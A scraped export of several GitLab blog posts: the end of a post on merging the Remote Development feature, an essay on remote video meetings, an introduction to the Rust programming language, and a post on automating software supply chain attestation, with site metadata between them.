We accepted that some aspects would be overlooked in the initial MR review cycle, but we committed to addressing them in subsequent iterations.\n\n### Keeping the pipeline green and stable for the merge\nTo ensure the successful merge of the integration branch containing the Remote Development feature, our team made significant efforts to keep the pipeline green and stable. As the MR was quite large and contained critical functionality, it was crucial to maintain a high level of quality and reduce the risk of introducing regressions.\n\nTo address these challenges, the team adopted a disciplined approach to [CI/CD](https://about.gitlab.com/topics/ci-cd/). Throughout the development process, CI pipelines were carefully monitored, and any failing tests or issues were promptly addressed. The team conducted rigorous testing and code reviews to identify and fix potential bugs and ensure that the changes did not negatively impact the existing functionality of the codebase.\n\nAdditionally, extensive test coverage was put in place to ensure that the new feature worked as expected and did not cause unintended side effects. The team utilized GitLab's [test coverage visualization](https://docs.gitlab.com/ee/ci/testing/test_coverage_visualization.html) capabilities to track the extent of test coverage and identify areas that required additional testing.\n\n![PIPE](https://about.gitlab.com/images/blogimages/remote-development/PIPE.png){: .shadow.medium}\n\n## The merging process\nAs part of the Remote Development team, we took a strategic approach to the merging process. We identified three categories of follow-up tasks that needed to be addressed after the release:\n\n1. **To-dos:** This category encompassed follow-up issues that required further attention.\n2. **Disabled linting rules:** Any issues related to disabled linting rules were included in this category.\n3. 
maintain a historical record of the conversations to refer back to in the future.
However, we kindly requested that [direct messages were avoided](https://about.gitlab.com/handbook/communication/#avoid-direct-messages) to promote open collaboration. The resolutions to these urgent issues were documented in the corresponding GitLab issues or MR discussions.\n4. **Zoom collaboration room:** The collaborative sessions held in the open Zoom room were not only beneficial for real-time discussions but also for fostering a collaborative environment. After each session, we summarized the key points and decisions made during the meeting in the associated GitLab issue or MR, making sure all important outcomes were captured and accessible to the team.\n\nThroughout the review process, we were committed to maintaining a seamless and well-documented workflow. By capturing all relevant information in GitLab issues, epics, and MR reviews, we ensured that the knowledge was persistently available, and future team members could easily understand the context and decisions made during the integration process.\n\n## Application security review\nDuring the application security review process, we focused on providing a secure and reliable Remote Development feature for our users. Here are the key resources and updates related to the application security review:\n\n1. **Main application security review issue:** The main application security review issue served as the central hub for tracking security-related considerations. You can find the defined process we followed [here](https://about.gitlab.com/handbook/security/security-engineering/application-security/appsec-reviews.html).\n2. **Application security review comment:** The application security review issue contained a comment indicating that the merge was not blocked unless there were severe issues that could impact production. 
\"In order to maintain a smooth merge process, we do not block MRs from being merged unless we identify severe issues that could prevent the feature from going into production, such as S1 or S2 level problems. If you are aware of any design flaws or concerns that might qualify as such issues, please bring them to our attention. We can review them together and address any questions or concerns that arise. Let's work collaboratively to find an approach that works for both parties. 👍\"\n3. **Engineering perspective:** For managing the application security review process from an engineering team perspective, we had a dedicated issue, which is kept confidential for security reasons. \n4. **Security and authentication matters:** All security and authentication concerns pertaining to the Beta release were documented within the [`Remote Development Beta -Auth` epic](https://gitlab.com/groups/gitlab-org/-/epics/10377). As of April 30, 2023, we are delighted to announce that **no known issues or obstacles were found that would impede the merge**. This represents a significant accomplishment, considering the intricate nature of this new feature.\n5. **Initial question raised:** During the application security review, one initial question was raised, and we promptly addressed it. You can track the issue and our response [here](https://gitlab.com/gitlab-org/gitlab/-/issues/409317).\n\n## Database review\nTo ensure the reliability and efficiency of the Remote Development feature, we sought guidance from the database reviewer. Although the team had not conducted a thorough self-review, we were fully prepared to address any blocking issues raised during the review process. 
Our references for the review were:\n\n- [Database review documentation](https://docs.gitlab.com/ee/development/database_review.html)\n- [Database reviewer guidelines](https://docs.gitlab.com/ee/development/database/database_reviewer_guidelines.html)\n\nAs an example, during the database migration review, a discussion arose between [Alper Akgun](https://gitlab.com/a_akgun) and Chad, regarding the efficient ordering of columns in the workspaces table. Alper initially suggested placing integer values at the beginning of the table based on relevant documentation.\n\nChad questioned the benefit of this suggestion, pointing out that the specific integer field, `max_hours_before_termination`, would still be padded with empty bytes even if moved to the front, due to its current position between two text fields.\n\nAlper proposed an alternative approach, emphasizing that organizing variable-sized fields (such as `text`, `varchar`, `arrays`, `json`, `jsonb`) at the end of the table could be sufficient for the workspaces table.\n\nUltimately, Chad took the initiative to implement the changes, moving all variable length fields to the end of the table, and documented the discussion as a comment to address review suggestions.\n\nWith this collaborative effort, the workspaces table was efficiently optimized, and the team gained valuable insights into database column ordering strategies.\n\n![DB](https://about.gitlab.com/images/blogimages/remote-development/DB.png){: .shadow.medium}\n\n## Ruby code review\nDuring the Ruby code review phase, we followed a meticulous approach by conducting a comprehensive self-review of every line of code. Our goal was to ensure the highest code quality and address any potential issues identified by the reviewers effectively.\n\nTo ensure clarity, it's important to clarify that the Ruby code review primarily focused on backend changes and server-side improvements. 
This included optimizing performance, enhancing functionalities, and refining the overall codebase to deliver a seamless user experience.\n\nFor the code review process, we referred to the [Code review documentation](https://docs.gitlab.com/ee/development/code_review.html), a valuable resource that guided us in maintaining industry best practices and adhering to the GitLab community's coding standards.\n\n### Example: Enhance error messages for unavailable features\nAs an example during the code review, we addressed an essential aspect of the workspace method, focusing on how we handle scenarios related to the `remote_development_feature_flag` and the `remote_development` licensed feature. The primary objective was to enhance the error messages presented to users when these features are not available.\n\nInitially, the code employed identical error messages for both cases, making it less clear to users whether the issue was due to a missing license or a disabled feature flag. This ambiguity could lead to confusion and hinder the user experience.\n\n#### The suggested improvement\nDuring the review, one of our maintainers, [Peter Leitzen](https://gitlab.com/splattael), raised an important question: \"Are we OK with having only a single error message for both cases (missing license and missing feature flag)?\"\n\nRecognizing the importance of clear communication, Chad proposed enhancing the error messages to provide distinct descriptions for each case. 
This improvement aimed to empower users by precisely conveying the reason behind the unavailability of certain features.\n\n#### The revised implementation\nFollowing Chad's suggestion, the code underwent the following changes:\n\n```ruby\nunless ::Feature.enabled?(:remote_development_feature_flag)\n  # TODO: Could have `included Gitlab::Graphql::Authorize::AuthorizeResource` and then use\n  #       raise_resource_not_available_error!, but didn't want to take the risk to mix that into\n  #       the root query type\n  raise ::Gitlab::Graphql::Errors::ResourceNotAvailable,\n    \"'remote_development_feature_flag' feature flag is disabled\"\nend\n\nunless License.feature_available?(:remote_development)\n  # TODO: Could have `included Gitlab::Graphql::Authorize::AuthorizeResource` and then use\n  #       raise_resource_not_available_error!, but didn't want to take the risk to mix that into\n  #       the root query type\n  raise ::Gitlab::Graphql::Errors::ResourceNotAvailable,\n    \"'remote_development' licensed feature is not available\"\nend\n\nraise_resource_not_available_error!('Feature is not available') unless current_user&.can?(:read_workspace)\n```\n\n#### The value of distinct error messages\nBy implementing distinct and descriptive error messages, we reinforce our commitment to user-centric development. Users interacting with our system will receive accurate feedback, helping them navigate potential roadblocks effectively. This enhancement not only improves the user experience but also streamlines troubleshooting and support processes.\n\nThis code review example highlights the significance of concise and informative error messages in delivering a top-notch user experience within the GitLab ecosystem. 
Our team's collaborative efforts ensure that users can confidently interact with our platform, knowing they'll receive clear and helpful error messages when needed.\n\n![BE1](https://about.gitlab.com/images/blogimages/remote-development/BE1.png){: .shadow.medium}\n\n### Example: Improving performance and addressing N+1 issues in WorkspaceType\nIn a recent code review, our team focused on optimizing the WorkspaceType and addressing potential N+1 query problems. The discussion involved two key contributors, [Laura Montemayor](https://gitlab.com/lauraX) and Chad, who worked together to enhance the performance of the codebase.\n\n#### Identifying the performance concerns\nDuring the review, Laura raised a performance concern regarding the possibility of N+1 queries in the WorkspaceType resolver. She suggested that preloading certain associations could be beneficial to avoid this common performance issue.\n\n#### A separate issue for N+1 control\nChad took prompt action and created a separate issue specifically aimed at resolving the N+1 query problems. The new issue, titled \"Address review feedback: Resolve N+1 issues,\" would address the concerns raised by Laura and implement the necessary preloading.\n\n#### Evaluating the potential N+1 impact\nChad provided insightful information about the low risk of real N+1 impact from two particular fields in the current implementation. He elaborated on how the queries for user and agent associations would largely be cache hits due to scoping and usage patterns. 
Chad diligently examined the cache hits happening in development, confirming the potential optimization.\n\nHere's a code snippet from the initial implementation:\n\n```ruby\n# Initial Implementation\nclass WorkspaceType \u003C BaseType\n  field :user, ::Types::UserType,\n    description: \"User associated with this workspace\",\n    null: true\n\n  field :agent, ::Types::AgentType,\n    description: \"Agent associated with this workspace\",\n    null: true\n\n  # Resolver for the user association\n  def user\n    object.user\n  end\n\n  # Resolver for the agent association\n  def agent\n    object.agent\n  end\nend\n```\n\n#### Treating performance as a priority\nBoth contributors acknowledged the significance of addressing the performance concern, with Laura emphasizing its importance. They agreed to prioritize the separate issue dedicated to resolving the N+1 queries and ensuring proper test coverage.\n\nHere's a code snippet from the revised implementation:\n\n```ruby\n# Revised Implementation with Preloading\nclass WorkspaceType \u003C BaseType\n  field :user, ::Types::UserType,\n    description: \"User associated with this workspace\",\n    null: true\n\n  field :agent, ::Types::AgentType,\n    description: \"Agent associated with this workspace\",\n    null: true\n\n  # Resolver for the user association with preloading\n  def user\n    ::Dataloader.for(::User).load(object.user_id)\n  end\n\n  # Resolver for the agent association with preloading\n  def agent\n    ::Dataloader.for(::Agent).load(object.agent_id)\n  end\nend\n```\n\n#### Considering future usage\nChad expressed excitement about the possibility of the new feature gaining significant usage. 
`ee/spec/frontend/remote_development/pages/create_spec.js`.
Other mock setup ...\n  \n  // Initial writeQuery for userWorkspacesQuery\n  mockApollo.clients.defaultClient.cache.writeQuery({\n    query: userWorkspacesQuery,\n    data: USER_WORKSPACES_QUERY_EMPTY_RESULT.data,\n  });\n\n  // ... Other mock setup ...\n};\n```\n\n#### Identifying a potential issue\nEnrique agreed that the duplicate write was unintentional and probably introduced during a rebase. He explained that pre-populating the cache with a user workspaces query empty result was essential for the mutator to have a place to add the workspace. However, he encountered difficulties in making the workaround work effectively in unit tests.\n\n#### Resolving the issue\nPaul highlighted the significance of pre-populating the cache with the user workspaces query empty result. He suggested leaving a comment to explain the necessity of the initial writeQuery, as it would be implicitly coupled to future writeQuery operations.\n\n```javascript\n// Resolving the Issue - Leaving a Comment\n// Pre-populate the cache with user workspaces query empty result to provide a place\n// for the mutator to add the Workspace later. This is needed for both test and production environments.\nmockApollo.clients.defaultClient.cache.writeQuery({\n  query: userWorkspacesQuery,\n  data: USER_WORKSPACES_QUERY_EMPTY_RESULT.data,\n});\n```\n\nHowever, upon further investigation, Paul discovered that the writeQuery might not be needed, and the issue might be a symptom of an underlying problem. 
He decided to open a separate thread to address this concern and indicated that he would work on a separate MR to handle it.\n\n```javascript\n// Resolving the Issue - Opening a Separate Thread and MR\n// Open a separate thread to discuss potential underlying issues.\n// Plan to work on a separate MR to handle it.\n// Stay tuned for updates!\n```\n\n![FE](https://about.gitlab.com/images/blogimages/remote-development/FE.png){: .shadow.medium}\n\n## What we learned\nAs part of the Remote Development team, we faced the challenge of merging the Remote Development Rails monolith integration branch to meet our ambitious release goal. We adapted to last-minute pivots and focused on minimizing risks during the review process. The successful merge brought us one step closer to benefiting GitLab users worldwide. We acknowledged areas for improvement and remained committed to refining the feature's quality. Our journey reflects our dedication to delivering results, embracing change, and pushing boundaries in the DevOps community. The release of the Remote Development feature in GitLab 16.0 is a significant milestone for GitLab, and we continue to iterate and grow, providing innovative solutions for developers worldwide.\n\nAn outcome of this process was an ongoing conversation to propose a [simplified review process for greenfield features](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/125117). Through this proposal, we aim to distill the lessons we learned during this experience and provide guidance to future teams facing similar challenges.\n\n## What is next for Remote Development?\nAfter the merge of the MR, several changes were implemented:\n- The first production tests were conducted to ensure the stability and functionality of the merged code.\n- Collaboration took place between the Dev Evangelism and Technical Marketing teams, focusing on [creating content](https://gitlab.com/groups/gitlab-com/marketing/developer-relations/-/epics/190). 
This collaboration aimed to troubleshoot any issues that arose during the merge.\n- Feedback from the community was taken into account, and changes were made to address the concerns raised. This feedback was incorporated into an [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/410031) and influenced the overall roadmap and direction of the project.\n\nDo you want to [contribute to GitLab](/community/contribute/)? Come and join in the conversation in the `#contribute` channel on GitLab's [Discord](https://discord.gg/gitlab), or just pop in and say \"Hi.\"\n\n",[752,867,686,845,708,9],{"slug":4599,"featured":6,"template":689},"remote-development-beta","content:en-us:blog:remote-development-beta.yml","Remote Development Beta","en-us/blog/remote-development-beta.yml","en-us/blog/remote-development-beta",{"_path":4605,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4606,"content":4612,"config":4618,"_id":4620,"_type":14,"title":4621,"_source":16,"_file":4622,"_stem":4623,"_extension":19},"/en-us/blog/remote-work-done-right",{"title":4607,"description":4608,"ogTitle":4607,"ogDescription":4608,"noIndex":6,"ogImage":4609,"ogUrl":4610,"ogSiteName":673,"ogType":674,"canonicalUrls":4610,"schema":4611},"Remote work, done right","Guest author Nolan Myers hated conference calls. 
Here's how we changed his mind.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679812/Blog/Hero%20Images/remote-work-done-right.jpg","https://about.gitlab.com/blog/remote-work-done-right","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Remote work, done right\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nolan Myers\"}],\n        \"datePublished\": \"2018-03-16\",\n      }",{"title":4607,"description":4608,"authors":4613,"heroImage":4609,"date":4615,"body":4616,"category":2074,"tags":4617},[4614],"Nolan Myers","2018-03-16","\n\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or discussion of other things related to GitLab._\n\nI’ve been on many terrible conference calls. The gentle voice telling me to enter my nine-digit pin, followed by the pound sign, feels like disappointment before the call even begins. That’s why I was so surprised to hear that GitLab – a company of over 200 people – runs without an office. How could anything get done when every meeting was remote?\n\n\u003C!-- more -->\n\nSeeing is believing, so I jumped at the opportunity to watch firsthand. What I learned convinced me that remote meetings can be just as good as in person, and maybe even better. Here’s what impressed me:\n\n### Video conference for all\n\nEveryone joined a Zoom call, each from their own computer. Most everyone had their cameras on, which gave enough visual cues to see their mood; sometimes even an understanding of who they are, like seeing a pool table or disassembled motorcycle behind them. The video format helped enforce some good meeting practices. Only one speaker at a time; a singular focus of attention, either a person or a shared screen. 
Meetings started on time, never having to wait for a previous group to clear a conference room. Having everyone join independently also worked much better than having a few people in a room and a few remotes, which inevitably creates a power-center in the room.\n\n>The video format helped enforce some good meeting practices: only one speaker at a time; a singular focus of attention\n\n### Create a live agenda in a shared document\n\nEach meeting started with an agenda in a shared Google Doc. They coupled this with a “write before you speak” etiquette. Anyone was welcome to speak, and added a brief summary of their question or comment into the shared doc before chiming in. This encouraged the speaker to be deliberate about their point, think about where in the flow it made most sense, and to know they’d get the floor when appropriate. It was kind of a marvel to see bullets and sub-bullets evolve during the meeting. A task owner typed “TODO: follow up” right as they said “I got it.” Even better, they were left with detailed meeting notes for posterity.\n\n>It was kind of a marvel to see bullets and sub-bullets evolve during the meeting. A task owner typed “TODO: follow up” right as they said “I got it.”\n\n### Embrace multitasking\n\nHow often have you heard that you should give a meeting your undivided attention? And how often have you actually believed it? GitLab embraces multitasking. Having everyone together ensures the right people are there for important conversations. But inevitably a packed meeting agenda will have sections more and less relevant to a variety of participants. Unlike in a room, a video call where someone tunes out for a bit doesn’t hamper the effectiveness of those focused on a conversation. The shared agenda let everyone know when they were needed, and each topic had the right people ready to contribute.\n\n### Caveats and considerations\n\nThis process felt like a miniature miracle to watch, but does need the right tools. 
GitLab relied on Zoom and it worked well. One external call used WebEx, and its longer latency led people accidentally to talk over one another. Google Docs was a must for the shared agenda. Everyone had set up a reasonable workspace with fast internet and a camera.\n\nI’d also add that I saw this work well for both update- and decision-oriented meetings. Would this approach support technical brainstorming meetings too? Sometimes drawing on a whiteboard works much better than typing, especially if you have a diagram. Zoom does have a whiteboard feature; perhaps with a Stylus you could do this as well as in person. I’m curious to see it in practice.\n\nWhen I first heard of GitLab’s remote-only hiring, I immediately saw the benefits of hiring in lower-rent locations and not paying for office space. I assumed that it cost some productivity through effective collaboration. Now I see video calls done right can beat all but the best traditional conference room meetings.\n\n## About the guest author\n\nNolan Myers advises startups on organizational development and customer success, leveraging his executive experience in building high-performing products and teams. He also has passions for classical music, fine cuisine, and urban design. 
Learn more on his [LinkedIn](https://linkedin.com/in/nolanmyers).\n\nPhoto by [Christin Hume](https://unsplash.com/photos/slbqShqAhEo) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[2660,803,686,779,9],{"slug":4619,"featured":6,"template":689},"remote-work-done-right","content:en-us:blog:remote-work-done-right.yml","Remote Work Done Right","en-us/blog/remote-work-done-right.yml","en-us/blog/remote-work-done-right",{"_path":4625,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4626,"content":4631,"config":4636,"_id":4638,"_type":14,"title":4639,"_source":16,"_file":4640,"_stem":4641,"_extension":19},"/en-us/blog/rust-programming-language",{"title":4627,"description":4628,"ogTitle":4627,"ogDescription":4628,"noIndex":6,"ogImage":3122,"ogUrl":4629,"ogSiteName":673,"ogType":674,"canonicalUrls":4629,"schema":4630},"A guide to Rust programming language","Rust is a well-loved programming language but it is a mindset shift from options like C++. Here's a tutorial and an inside look at Rust code and its capabilities.","https://about.gitlab.com/blog/rust-programming-language","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A guide to Rust programming language\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-07-21\",\n      }",{"title":4627,"description":4628,"authors":4632,"heroImage":3122,"date":4633,"body":4634,"category":682,"tags":4635},[1273],"2020-07-21","\n\n## What is Rust?\n\nRust is an open source programming language that has been the \"most loved language\" on developer community Stack Overflow's annual survey for the last four years. While it's a popular language in that sense, only a very, _very_ small number of developers actually use Rust language today – a July 2020 look at the PYPL PopularitY of Programming Languages Index ranks it at number 18 with just .81% interest. 
(For comparison Python is at nearly 32% and Java is over 17%.)\n\nSo why the intense love of the Rust programming language? To put it simply, Rust coding was created to solve problems present in other languages and if you can take the time to unlock its (admittedly difficult) secrets, you're rewarded with cleaner, faster, and most importantly, safer code. Rust code resolves pain points that you see in countless other programming languages with far fewer downsides. Utilizing Rust allows developers to decide when they no longer need memory at the time of compilation which creates more efficiency around memory usage.\n\n[Antony Saba](/company/team/#asaba), a senior security engineer with Strategic Security at GitLab, recently talked about Rust during a company-wide series of meetings ([Contribute 2020](/events/gitlab-contribute/)). He speaks from experience as his last employer was a Rust-based company. \"Okay, so what's Rust's promise?\" Saba asked. \"Rust's promise is that it should be easier, and everybody should be able to fearlessly write at a systems level and not have to worry about memory safety or thread safety, or at least worry about it in the way that is supported by the language and the tools.\"\n\nLet's unpack what that means.\n\n## History of Rust programming language\n\nThe [open source Rust community](https://www.rust-lang.org) describes the language as fast, reliable and productive. \"Hundreds of companies around the world are using Rust in production for fast, low-resource cross-platform solutions,\" the organization says. Firefox and DropBox are two well-known users of Rust today, and Mozilla (creator of Firefox) was the first original supporter of Rust.\n\n### Who created Rust?\n\nRust code was originally developed as an open source project by software developer Graydon Hoare while working at Mozilla Research in 2006 and has been maintained by the Rust Foundation since 2021. It’s now one of the top drivers of the Rust programming language. 
\n\nThink of Rust as the answer to a data-rich problem that will likely need lots of computational cycles. Mozilla's [Rust documentation](https://research.mozilla.org/rust/) specifically calls out the language as ideal for \"game engines, operating systems, file systems, browser components and simulation engines for virtual reality.\"\n\n## Benefits of programming in Rust\n\nThe top benefit of Rust coding is its adept memory management. Although there are other programming languages that emphasize memory safety like Rust code, Rust handles the concept differently in that it doesn’t use a garbage collector as other programming languages do. Instead, Rust uses a borrow checker to track variable scope and object lifetime while simultaneously administering high-quality memory safety and stopping concurrent data races. \n\nThe benefits of programing in Rust don’t stop at memory management. It’s fast and reliable for creating web apps and creating cross-platform applications, and it can integrate with preexisting code. \n\nOne of the other major benefits of Rust programming language is that it is well-suited for projects that demand extremely high performance. Its ability to process large amounts of data and CPU-intensive operations makes it a strong competitor in the developer space. \n\nOther Rust feature benefits offer a list of features that makes it stand out from other programming languages. Here are some of the features:\n\n1. It’s more user-friendly.\n2. You’ll find high-quality documentation about the language.\n3. It has a better resolution of memory errors and concurrent programs than C and C++ languages.\n4. It’s incredibly fast and highly secure compared to other languages.\n\n## The Rust ecosystem\n\nThe [JetBrains 2021 Developer Ecosystem Report](https://www.jetbrains.com/lp/devecosystem-2021/rust/) found that Rust developers have mostly been using it for less than six months, and often reach for the language for \"hobby\" or personal projects. 
What are devs primarily writing with Rust? The report found command line interface tools, systems programming and web development were the most popular options.\n\nMany companies have started using Rust, though. In 2020, [Discord switched from Go to Rust](https://discord.com/blog/why-discord-is-switching-from-go-to-rust), and Shopify, Dropbox, AWS and many others use it as well. \n\n## The basics of Rust programming language\n\nRust is a bit of a hybrid, according to Mozilla's Rust documentation. Rust offers developers the syntax advantages of high-level languages with the \"control and performance of a low-level language,\" the documentation explains.\n\nRust is a statically typed language rather than a dynamic one. Though developers like to argue the merits of both, Rust, like popular TypeScript, eliminates the frustration of \"dynamic typing.\" Data is constrained and checked by a compiler so confusion is minimized. Rust programming also makes it very hard to ignore errors – Steve Donovan, author of [\"A Gentle Guide to Rust,\"](https://stevedonovan.github.io/rust-gentle-intro/) jokes it can be hard not to think the compiler is shouting at you when you make a mistake.\n\nDonovan identifies Rust's key principles as:\n\n* Strictly enforcing safe borrowing of data\n* Functions, methods, and closures to operate on data\n* Tuples, structs, and enums to aggregate data\n* Pattern matching to select and destructure data\n* Traits to define behaviour on data\n\n## Types of Rust coding\n\nRust treats values by breaking them down into \"types\" in order to handle the data appropriately. According to MIT's guide to Rust, there are a number of types that can be split into scalar or integer types. Scalar types will likely be familiar to those who work with other programming languages: characters, Booleans, floating-point numbers and integers. They all represent a single value. Compound types are what they sound like – multiple types together.  
\n\n## Who uses Rust?\n\nAll of the guardrails mentioned lead to a language that can create fast-moving code with few things that slow it down. There's no runtime or garbage collection, making coding in Rust ideal for applications where memory usage is at a premium (like embedded devices). But if there is a place where Rust really stands out, it's security. Donovan points out that Rust is \"safe by default,\" unlike C or C++. No one can corrupt memory by default, he writes.\n\n## The Rust programming language and productive coding\n\nAfter three years of coding in Rust, Antony was quick to say he's probably more productive with the language than any other.\n\n\"I really do feel like Rust was the most productive language I've ever used,\" he says. \"Once you are doing everything in that functional style, you're writing less code, but it's still clearer, because you don't have temporary variables. They're a thing that you don't really end up using when you're writing code that way. So, to me, it's those little things that I get the productivity out of.\"\n\n## Rust can be touchy, but rewarding\n\nProductive, sure, but there's a learning curve with Rust.\n\n\"It's true the borrow checker is the hardest part,\" Antony says. \"But the thing is, once you get past that, there is a serious dopamine hit when that program compiles, because it means now you only have your own logic errors to deal with. Part of that pain is explicitly some of the things that you assume, and some of the little white lies that you tell yourself when you're starting, especially with a C program. Because when you start your C program, it's like, 'all right, I have a couple command line parameters, I don't really want to write all my functions just to pass them, so I'm just going to declare a couple global variables and shove them in there, and I'll clean it up later.' Right? It's one of those little lies we tell ourselves. But you can't have immutable global variables in Rust. 
It just won't let you. You have to wrap it – you may as well just do the functions right. They're going to use your command-line arguments. It's the same with thread safety. You kind of have to do that upfront, and you don't get to make that assumption.\"\n\n## Looking to the future of the Rust programming language\n\nRust has a bright future, even if it might not be as widespread as other languages, Antony explains. \"I don't think it's ever going to be as popular as Go, just because Google is Google, and there's a lot of places that Go is really good for,\" he says. \"But for those places where you really want that fearless development, I think it'll continue to have a strong hold there.\"\n\nWatch Antony's Rust demo in full here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/INT_rGJr6JQ\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n**Read more about programming languages:**\n\nCan we solve the [COBOL programmer shortage?](/blog/cobol-programmer-shortage/)\n\nWhy we use [Ruby on Rails](/blog/why-we-use-rails-to-build-gitlab/) to build GitLab\n\nHow [Modern C and C ++ work](/blog/conan-c-cpp-package-management-integration/)\n\nCover image by [Zsolt Palatinus](https://unsplash.com/@sunitalap) on [Unsplash](https://unsplash.com)\n{: .note}\n",[9,865,752],{"slug":4637,"featured":6,"template":689},"rust-programming-language","content:en-us:blog:rust-programming-language.yml","Rust Programming 
Language","en-us/blog/rust-programming-language.yml","en-us/blog/rust-programming-language",{"_path":4643,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4644,"content":4650,"config":4655,"_id":4657,"_type":14,"title":4658,"_source":16,"_file":4659,"_stem":4660,"_extension":19},"/en-us/blog/securing-the-software-supply-chain-through-automated-attestation",{"title":4645,"description":4646,"ogTitle":4645,"ogDescription":4646,"noIndex":6,"ogImage":4647,"ogUrl":4648,"ogSiteName":673,"ogType":674,"canonicalUrls":4648,"schema":4649},"Securing the software supply chain through automated attestation","Standards bodies want to know how orgs are protecting against software tampering. Learn how automating compliance attestation can help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667086/Blog/Hero%20Images/blog-compliance.jpg","https://about.gitlab.com/blog/securing-the-software-supply-chain-through-automated-attestation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Securing the software supply chain through automated attestation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-08-10\",\n      }",{"title":4645,"description":4646,"authors":4651,"heroImage":4647,"date":4652,"body":4653,"category":865,"tags":4654},[862],"2022-08-10","\nSecuring the software supply chain is not a one-and-done proposition. Instead, organizations, especially those in the public sector, must level up their protections as governing bodies add to their security frameworks. If you need proof of this, look no further than the sudden emergence of attestation requirements.\n\nAttestation is [an authenticated statement](https://slsa.dev/attestation-model) (metadata) about a software artifact or collection of software artifacts. 
Attestation is a key feature of [SLSA](https://slsa.dev/)(Supply chain Levels for Software Artifacts) Certification Level 2, which requires organizations to protect against software tampering and add minimal build integrity guarantees. The concept of attestation, along with presenting a software bill of materials ([SBOM](https://gitlab.com/groups/gitlab-org/-/epics/858)), is featured prominently in the [NIST Secure Software Development Framework](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/) and ISACA’s [Certified Information Security Auditor training](https://www.isaca.org/credentialing/cisa).\n\n“In the past few months and in the wake of high-profile security breaches, the major governing bodies have been laser-focused on attestation and the ability to provide a verified artifact from your continuous integration (CI) pipelines that show you’ve completed all your security scans in a way that would be acceptable and compliant with the standards they set forth,” says [Joel Krooswyk](https://gitlab.com/jkrooswyk), senior manager of solutions architects at GitLab.\n\n“While the government is certainly leading on these requirements, the need for attestation applies to everyone,” says [Sam White](https://gitlab.com/sam.white), principal product manager at GitLab. \n\n## The demand for attestation automation\n\nOrganizations might have previously felt comfortable performing periodic self-audits for compliance attestation, but [the stakes are now too high](/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security/) and public sector agencies, as well as private sector organizations, must consider automating this critical task, according to Krooswyk.\n\n“Until now, attestation has been a manual undertaking, which has been burdensome, expensive, and error-prone,” he says. 
“The more automation we can apply to attestation, and the more consistency we can incorporate from standards requirements, the better off software supply chain security will be and the more confidence we will have in development collaboration.”\n\nGitLab [introduced automated compliance attestation](https://docs.gitlab.com/ee/ci/runners/configure_runners.html#artifact-attestation) in Release 15.1. GitLab Runner can generate and produce attestation metadata for all build artifacts. To enable this feature, you must set the RUNNER_GENERATE_ARTIFACTS_METADATA environment variable to “true”. This variable can either be set globally or it can be set for individual jobs. The metadata is then rendered in a plain text .json file that’s stored with the artifact. \n\nLearn how to automatically generate GitLab SLSA Level 2 Build Artifact Attestation:\n\n\u003C!-- blank line -->\n\n\u003Cfigure class=\"video_container\">\n\n  \u003Ciframe src=\"https://www.youtube.com/embed/MlIdqrDgI8U\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\n\u003C/figure>\n\n\u003C!-- blank line -->\n\n## Building attestation into the development lifecycle\n\nSoftware development is a collaborative effort and organizations need to know that upstream dependencies have been built in a secure manner. “Not only do you need to know that the software has been developed without vulnerabilities, but that the machine that software was built on has not been compromised,” White says. 
“How can you know, without attestation, that the binary itself is authentic and that the risk has been minimized?” By automating attestation, organizations can help protect users of their software from code that has been injected with malware or build servers that have been overtaken.\n\n>Join us at [GitLab Commit 2022](/events/commit/) and connect with the ideas, technologies, and people that are driving DevOps and digital transformation.\n\n“If developers don’t have to worry about the setup or ongoing complexity of attestation, it will be a game-changer for the security industry, because you are validating right at the point of software development,” White says.\n\n## Next up: Integrated code signing and broader participation\n\nAs the public sector wades deeper into compliance, the next logical step is to introduce accountability through code signing. “Next, developers need to cryptographically sign both the build artifact and the attestation file,” White says. “This will add another layer of confidence in the build artifacts and the software supply chain overall.”\n\nAttestation also must become the norm upstream throughout the open source community. “Attestation is very much a network effect where the more people adopt it, the more effective it gets,” Krooswyk says. “Everyone needs to generate their own attestation at the point in time when they build their artifact.” \n\nKrooswyk adds that in addition to SBOM validation, he would like to see attestations expand to include all vulnerabilities that are known at the time a project is built. “We need a continuous ability to create a birth-to-death artifact history,” he says.\n\nAll users on a GitLab 15.1 or later release can get started with generating attestation for their build artifacts by setting `RUNNER_GENERATE_ARTIFACTS_METADATA: true` in their CI pipeline.  For a more comprehensive approach, users can take advantage of security approvals, code scanning, and compliance auditing by using GitLab Ultimate. 
